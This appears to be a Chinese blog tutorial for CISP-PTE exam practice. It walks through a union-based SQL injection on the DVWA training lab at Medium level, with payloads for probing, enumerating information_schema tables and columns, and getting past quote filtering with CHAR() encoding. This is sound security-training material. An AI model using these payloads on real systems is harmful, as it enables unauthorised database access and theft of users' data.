CISP-PTE SQL注入 进阶篇之实战模拟

最新推荐文章于 2024-05-03 16:15:08 发布
最新推荐文章于 2024-05-03 16:15:08 发布
阅读量522 收藏 1
点赞数
分类专栏: CISP-PTE实战模拟 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beirry/article/details/124257216
版权

此次实战模拟的靶场为DVWA,将等级调为Medium

Medium

这是由POST传值传输数据
在这里插入图片描述
在这里插入图片描述

用Hackbar来传输POST,id=2,则数据更新,说明id是我们的注入点
在这里插入图片描述

判断类型

输入1 and 0#,无返回值,则是数字型
在这里插入图片描述

判断显示位

order by 1#输入到 order by 3#开始报错,则显示位只有2位
在这里插入图片描述

查看显示位

输入-1 union select 1,2#,看看1,2会出现在哪个位置

在这里插入图片描述

查表

输入-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
在这里插入图片描述
得到guestbook,users,world三张表

查字段名

输入-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
在这里插入图片描述
发现引号被过滤了,那我们将其char编码,在这里输入users,得到CHAR(117, 115, 101, 114, 115)
在这里插入图片描述

得到字段名:id,login,password,email,secret,activation_code,activated,reset_code,admin,user_id,first_name,last_name,user,password,avatar,last_login,failed_login,yinhangka,phone,shenfenzheng,id,username,password,level,id,username,card

查字段

这里取first_name,password查询
在这里插入图片描述

beirry
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CISP-PTE之命令注入篇
lza20001103的博客
07-06 1480
CISP-PTE之命令注入篇
CISP-PTE 练习题目-sql注入1
qq_29576929的博客
08-13 3092
sql注入
pymysql操作以及简单sql注入模拟
qq_37369726的博客
12-17 721
pymysql是python连接mysql操作的一个模块,pymysql操作: import pymysql conn = pymysql.connect( host='192.168.247.100', port=3306, user='root', password='123457', database='test', charset='utf8' ) # cursor = conn.cursor(pymysql.cursors.DictCursor)
2024年网安最新cisp-pte通关靶场思路分享_cisp-pte靶场(1)
最新发布
2401_84297560的博客
05-03 441
文章写在还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
CISP-PTE SQL注入 入门篇之实战模拟
beirry的博客
12-22 732
此次实战模拟的靶场为DVWA,将等级调为low 判断类型 判断是否为数字类型1 and 0#,如果是数字类型,点击提交会报错。没报错,很明显不是数字类型,尝试字符类型1',如果页面报错,则是字符类型。 判断显示位 输入1 order by 1#一直输入到1 order by 3#,报错了说明显示位只有2个 查看显示位 -1' union select 1,2# 将前面的1置空(无法查询到信息就可以了),查找显示位 查看数据库信息 -1' union select database(),@@vers
渗透测试CISP-PTESQL注入
未知2066的博客
02-02 1367
SQL注入是一种常见的网络攻击技术,攻击者通过在应用程序的输入字段中插入恶意的SQL代码,以获取未经授权的访问或修改数据库的权限。攻击者可以利用SQL注入漏洞执行任意的数据库操作,如查询、修改、删除数据,甚至获取敏感信息。SQL Injection:通过把sql命令插入到web表单递交或输入域或页面请求的查询字符串,达到欺骗服务器执行恶意的sql命令。
cisp-pte考试环境下载-原题 题库
04-01
本考试为业内首家实操型渗透测试技术水平注册考试,考试内容从多个角度出发,将客观题与实操题两者结合,来考核考生的全面能力。通过多个得分点,充分检验考生对于最新网络安全技术的掌握程度,展现考生在真实的...
CISP-PTE靶场(win+centos).zip
03-13
CISP-PTE靶场是一个针对信息安全专业人员进行渗透测试与应急响应能力训练的平台,它涵盖了Windows和Linux两种操作系统环境。这个压缩包包含了两个不同系统的靶场环境:win2003和CentOS,以及一个关于如何搭建CISP-...
cisp-pte注册渗透测试工程师详细资料及视频教程
07-16
CISP-PTE,全称为Certified Information Security Professional - Penetration Testing Engineer,即注册信息安全专业人员-渗透测试工程师,是一项针对网络安全专业人士的高级认证。这个认证主要针对的是那些专注于...
【推荐】渗透测试工程师(CISP-PTE)认证培训课件资料合集(18份).zip
11-29
推荐,注册信息安全专业人员渗透测试工程师(CISP-PTE)认证培训课件资料合集,共18份。 001-Linux操作系统安全V2.0.pptx 002-Windows操作系统安全V2.0.pptx 003-数据库安全.pptx 004-Web安全基础0 - 介绍.pptx 005...
CISP-PTE模拟练习网站源码.zip
11-22
CIS-PTE模拟练习网站源码,大家有需要的可以下载练习。祝大家顺利通过考试
CISP全套考试题目带答案
11-27
收集了历年的cisp考试题目、700道cisp考试题目,共有6套考试题目,一套练习题库
JDBC模拟SQL注入和避免SQL注入
YOU__FEI的博客
10-03 1009
导致SOL注入的根本原因是:用户不是一般的用户,用户是懂得程序的,输入的用户名信息以及密码信息中含有SOL语句的关健字,这个SQL语句的关健字和底层的SQL语句进行 “字符串拼接”,导致原SQL语句的含义被扭曲了。最最最最最最主要的原因是:用户提供的信息参与了SQL语句的编译,这个程序是先进行的字符串拼接,然后再进行的SQL语句的编译,正好被注入...........
CISP-PTESQL注入(二次注入的应用)
lza20001103的博客
07-04 2575
CISP-PTESQL注入(二次注入的应用)
CISP-PTE SQL注入-基础篇
beirry的博客
12-08 4025
CISP-PTE考试中,题型大多都不会难,更多的是知识层面广泛,平时可以多做做CTF的基础题,对考试有一定的帮助。
CISP-PTE SQL注入 入门篇
beirry的博客
12-21 1434
经过上一篇的文章,相信大家也初步掌握了sql语句,现在我们就来学习SQL注入的攻击语句。 mysql在版本5之前,只能通过盲注来获取数据,mysql在版本5以后,可以获取信息的方式就很多了,因为含有默认的库:information_schema,这个库存储着mysql的结构信息。我们通过这个库来获取数据表名,字段名。 判断查询类型 select * from users where id=1 这个语句意思是查询users表中id为1的所有字段,当我把这个id的字段挖空,让这个字段可以用户自己输入。那么攻击
网络攻防技术——SQL注入
学习记录
02-27 3118
一、题目 SQL注入是一种代码注入技术,它利用web应用程序和数据库服务器之间接口中的漏洞。当用户的输入在发送到后端数据库服务器之前未在web应用程序中正确检查时,就会出现此漏洞。许多web应用程序从用户处获取输入,然后使用这些输入构造SQL查询,这样web应用程序就可以从数据库中获取信息。Web应用程序还使用SQL查询在数据库中存储信息。这些是web应用程序开发中的常见做法。如果未仔细构造SQL查询,则可能会出现SQL注入漏洞。SQL注入攻击是对web应用程序最常见的攻击之一。 在本实验室中,我们创建了一
CISP-PTE综合题靶场训练
weixin_46263525的博客
07-11 1574
CISP-PTE综合题靶场训练及解题思路
360 cisp-pte sql 环境 下载
08-22
在360 CISP-PTE SQL环境下载方面,可以通过以下步骤完成...总之,通过360 CISP-PTE SQL环境下载,用户可以方便地获取一个安全的环境进行SQL注入实验和训练,以提升自己的技术水平和安全意识。希望以上回答对您有帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

beirry

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值